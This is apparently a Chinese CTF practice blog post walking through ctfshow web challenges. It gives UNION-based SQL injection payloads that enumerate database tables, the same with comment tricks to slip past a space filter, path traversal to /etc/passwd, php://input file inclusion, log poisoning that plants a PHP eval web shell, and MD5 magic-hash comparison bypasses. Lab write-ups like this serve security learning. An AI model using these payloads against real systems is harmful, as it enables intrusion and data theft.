ctfshow刷题记录

web2

在这里插入图片描述

1' union select 1,2,3#

在这里插入图片描述
注入点在2

1' union select 1,database(),3#

在这里插入图片描述
web2

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

在这里插入图片描述
flag,user

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#

在这里插入图片描述
flag

1' union select 1,group_concat(flag),3 from flag#

在这里插入图片描述

web3

一道文件包含题,get ?url

先测试一下

?url=../../../../../../../etc/passwd

在这里插入图片描述
那么我们试试伪协议 php://input post提交命令
在这里插入图片描述
但是没有反应,bp试试
在这里插入图片描述
bp有反应,ctf_go_go_go应该就是flag所在的文件了
在这里插入图片描述

web4

?url=../../../../../../../etc/passwd

依旧有回显,那么还是文件包含
但是php貌似被过滤了
于是日志注入

?url=/var/log/nginx/access.log

然后注入一句话木马

为了防止url编码,需要使用burp

如果直接在url里面插入一句话会返回:

400 Bad Request

因此只能在burp的AG参数里面插入一句话

<?php eval($_POST['hack']);?>

在这里插入图片描述
然后蚁剑连接就行了

在这里插入图片描述

web5

<?php
        $flag="";
        $v1=$_GET['v1'];
        $v2=$_GET['v2'];
        if(isset($v1) && isset($v2)){
            if(!ctype_alpha($v1)){
                die("v1 error");
            }
            if(!is_numeric($v2)){
                die("v2 error");
            }
            if(md5($v1)==md5($v2)){
                echo $flag;
            }
        }else{
        
            echo "where is flag?";
        }
    ?>

“0E”开头的哈希值都解释为0
所以只要v1与v2的md5值以0E开头即可。

v1=QNKCDZO&v2=240610708

在这里插入图片描述
0e开头的md5和原值:
QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469

web6

在这里插入图片描述
sql注入

1' or 1=1#

在这里插入图片描述
应该是有过滤,检测之后过滤的是空格

1'/**/or/**/1=1#

在这里插入图片描述

1'/**/union/**/select/**/1,2,3#

在这里插入图片描述

1'/**/union/**/select/**/1,database(),3#

在这里插入图片描述

1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#

在这里插入图片描述

1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#

在这里插入图片描述

1'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/flag#

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值